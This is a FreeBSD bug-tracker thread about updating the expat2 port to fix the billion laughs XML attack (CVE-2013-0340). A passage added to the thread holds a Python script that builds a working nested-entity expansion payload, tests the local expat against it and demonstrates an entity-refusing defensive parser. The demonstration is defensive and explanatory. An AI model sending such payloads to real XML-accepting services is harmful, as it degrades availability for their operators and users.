Discussion:
[Bug 256121] [exp-run] textproc/expat2: update to 2.4.1 (fixes CVE-2013-0340/CWE-776)
b***@freebsd.org
2021-05-24 14:42:55 UTC
Permalink
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=256121

Bug ID: 256121
Summary: [exp-run] textproc/expat2: update to 2.4.1 (fixes CVE-2013-0340/CWE-776)
Product: Ports & Packages
Version: Latest
Hardware: Any
OS: Any
Status: New
Severity: Affects Only Me
Priority: ---
Component: Individual Port(s)
Assignee: ***@FreeBSD.org
Reporter: ***@freebsd.org
CC: ***@FreeBSD.org
Flags: exp-run?

Created attachment 225223
--> https://bugs.freebsd.org/bugzilla/attachment.cgi?id=225223&action=edit
v1

Hello,

desktop@ would like to ask for an exp-run to update textproc/expat2 to 2.4.1,
which includes a fix for the billion laughs attack, CVE-2013-0340/CWE-776.

The patch is attached and can also be found here:
https://people.freebsd.org/~tcberner/patches/0001-textprox-expat2-update-to-2.4.1-fixes-CVE-2013-0340-.patch

Regards, Tobias
--
You are receiving this mail because:
You are on the CC list for the bug.
b***@freebsd.org
2021-05-24 15:03:43 UTC

--- Comment #1 from commit-***@FreeBSD.org ---
A commit in branch main references this bug:

URL:
https://cgit.FreeBSD.org/ports/commit/?id=4ff544422ffe21f039595fc312b2e4bff39a705c

commit 4ff544422ffe21f039595fc312b2e4bff39a705c
Author: Tobias C. Berner <***@FreeBSD.org>
AuthorDate: 2021-05-24 15:02:45 +0000
Commit: Tobias C. Berner <***@FreeBSD.org>
CommitDate: 2021-05-24 15:02:45 +0000

security/vuxml: document vulnerability in textproc/expat2

Security: CVE-2013-0340
PR: 256121

security/vuxml/vuln.xml | 34 ++++++++++++++++++++++++++++++++++
1 file changed, 34 insertions(+)
b***@freebsd.org
2021-05-27 08:26:56 UTC

Antoine Brodin <***@FreeBSD.org> changed:

What     |Removed         |Added
---------+----------------+----------------
Flags    |exp-run?        |exp-run+
Assignee |***@FreeBSD.org |***@freebsd.org

--- Comment #2 from Antoine Brodin <***@FreeBSD.org> ---
Exp-run looks fine
b***@freebsd.org
2021-05-27 08:58:07 UTC

--- Comment #3 from commit-***@FreeBSD.org ---
A commit in branch main references this bug:

URL:
https://cgit.FreeBSD.org/ports/commit/?id=1454ab40206b85f94edb6390e0d96c9716a07399

commit 1454ab40206b85f94edb6390e0d96c9716a07399
Author: Tobias C. Berner <***@FreeBSD.org>
AuthorDate: 2021-05-24 14:38:28 +0000
Commit: Tobias C. Berner <***@FreeBSD.org>
CommitDate: 2021-05-27 08:56:26 +0000

textproc/expat2: update to 2.4.1 -- fixes CVE-2013-0340/CWE-776

See [1] for details:
Expat 2.4.0 and follow-up release 2.4.1 have both been released earlier
today (21-05-23). Release 2.4.0 fixes long known security issue
CVE-2013-0340 by adding protection against so-called Billion Laughs
Attacks, a form of denial of service against applications accepting XML
input, in all known variations, including recent flavor Parameter Laughs.

[1]
https://blog.hartwork.org/posts/cve-2013-0340-billion-laughs-fixed-in-expat-2-4-0

PR: 256121
Exp-run by: antoine

textproc/expat2/Makefile | 4 +++-
textproc/expat2/distinfo | 6 +++---
textproc/expat2/pkg-plist | 10 +++++-----
3 files changed, 11 insertions(+), 9 deletions(-)
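The billion laughs problem that the commit message in comment #3 describes, as an added example that is not part of this bug thread, the FreeBSD port, or the expat project. It runs against whatever expat the local Python links (`xml.parsers.expat` is a binding to expat), builds a constructed payload in the classic shape (a chain of nested internal entities, each referencing the previous one ten times), and reports two things: whether the unmodified parser is stopped by expat's own amplification guard, which is what 2.4.0 added, and how a parser hardened to refuse any entity declaration blocks the document before a single byte is expanded, which works regardless of expat version (the approach defusedxml takes). Helper names, the payload and the sample documents are assumptions constructed for the example; the 8 MiB activation threshold and 100x maximum amplification mentioned in the comments are expat 2.4.0's defaults as recalled by the example's author, not figures from the thread, so confirm them in your expat's XML_SetBillionLaughsAttackProtection* documentation.

```python
"""Billion laughs (CVE-2013-0340 / CWE-776) against the expat that Python links.

Added example for this bug thread; it is not code from the bug report, the
FreeBSD port or the expat project.  The payload, helper names and sample
documents are constructed here.  The 8 MiB activation threshold and 100x
maximum amplification quoted in comments are expat 2.4.0's defaults as the
example's author recalls them (XML_SetBillionLaughsAttackProtection*); the
thread does not state them, so verify against your expat's documentation.
"""
import xml.parsers.expat as expat


def build_billion_laughs(depth=6, fanout=10, base=b"lol" * 10):
    """Constructed payload: lol0 expands to `base`, every lolN references
    lol(N-1) `fanout` times, and the body references the outermost entity.
    The input is a few hundred bytes; expansion is fanout**depth * len(base)."""
    decls = [b'<!ENTITY lol0 "%s">' % base]
    for level in range(1, depth + 1):
        refs = (b"&lol%d;" % (level - 1)) * fanout
        decls.append(b'<!ENTITY lol%d "%s">' % (level, refs))
    return (b'<?xml version="1.0"?>\n<!DOCTYPE lolz [\n'
            + b"\n".join(decls)
            + b'\n]>\n<lolz>&lol%d;</lolz>\n' % depth)


def expected_expansion(depth=6, fanout=10, base_len=30):
    """Bytes of character data the payload expands to if nothing stops it."""
    return fanout ** depth * base_len


def amplification(doc, expanded):
    """expat's notion of amplification: (direct + indirect) / direct bytes."""
    return (len(doc) + expanded) / len(doc)


def parse_counting(doc):
    """Parse with an unmodified expat parser and count the bytes entities expand to.

    expat >= 2.4.0 aborts the parse (ExpatError) once more than about 8 MiB
    have been processed and expansion exceeds 100x the input (recalled
    defaults, see module docstring); older expat grinds through the whole
    expansion.  The handler discards the text, so the cost is time and
    callbacks rather than memory."""
    parser = expat.ParserCreate()
    counter = {"bytes": 0}

    def on_chars(data):
        counter["bytes"] += len(data)      # payload is ASCII, so chars == bytes

    parser.CharacterDataHandler = on_chars
    report = {"expat": expat.EXPAT_VERSION, "blocked": False, "reason": ""}
    try:
        parser.Parse(doc, True)
    except expat.ExpatError as err:
        report.update(blocked=True, reason=str(err))
    report["expanded_bytes"] = counter["bytes"]
    return report


def parse_rejecting_entities(doc):
    """Version-independent defence: refuse the document at the first entity
    declaration (general or parameter), before anything can be expanded.
    An exception raised inside an expat handler stops the parser and
    propagates out of Parse()."""
    parser = expat.ParserCreate()
    counter = {"bytes": 0}

    def on_chars(data):
        counter["bytes"] += len(data)

    def on_entity_decl(name, is_parameter, value, base, system_id,
                       public_id, notation_name):
        kind = "parameter" if is_parameter else "general"
        raise ValueError(f"refusing {kind} entity declaration {name!r}")

    parser.CharacterDataHandler = on_chars
    parser.EntityDeclHandler = on_entity_decl
    report = {"expat": expat.EXPAT_VERSION, "blocked": False, "reason": ""}
    try:
        parser.Parse(doc, True)
    except ValueError as err:
        report.update(blocked=True, reason=str(err))
    report["expanded_bytes"] = counter["bytes"]
    return report


if __name__ == "__main__":
    payload = build_billion_laughs()
    print(f"payload: {len(payload)} bytes, would expand to "
          f"{expected_expansion():,} bytes "
          f"(amplification {amplification(payload, expected_expansion()):,.0f}x)")
    for label, fn in (("plain expat", parse_counting),
                      ("entities refused", parse_rejecting_entities)):
        r = fn(payload)
        print(f"{label:17s} {r['expat']}: blocked={r['blocked']} "
              f"expanded={r['expanded_bytes']:,} {r['reason']}")
```

Running the file prints a report for both parsers: with expat 2.4.0 or later the plain parse is cut off with an amplification-limit error after a few MiB, while an older expat grinds through all 30,000,000 bytes (costing time and callbacks only, since the handler discards the text). The entity-refusing parser blocks the payload either way, at the price of rejecting legitimate documents that declare entities, which is usually the right trade for untrusted input and the check to keep even after the port update, since the amplification guard only covers applications that link the new library.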
b***@freebsd.org
2021-05-27 09:00:39 UTC

Tobias C. Berner <***@freebsd.org> changed:

What       |Removed |Added
-----------+--------+--------
Resolution |---     |FIXED
Status     |New     |Closed

--- Comment #4 from Tobias C. Berner <***@freebsd.org> ---
Committed - thanks for the exp-run.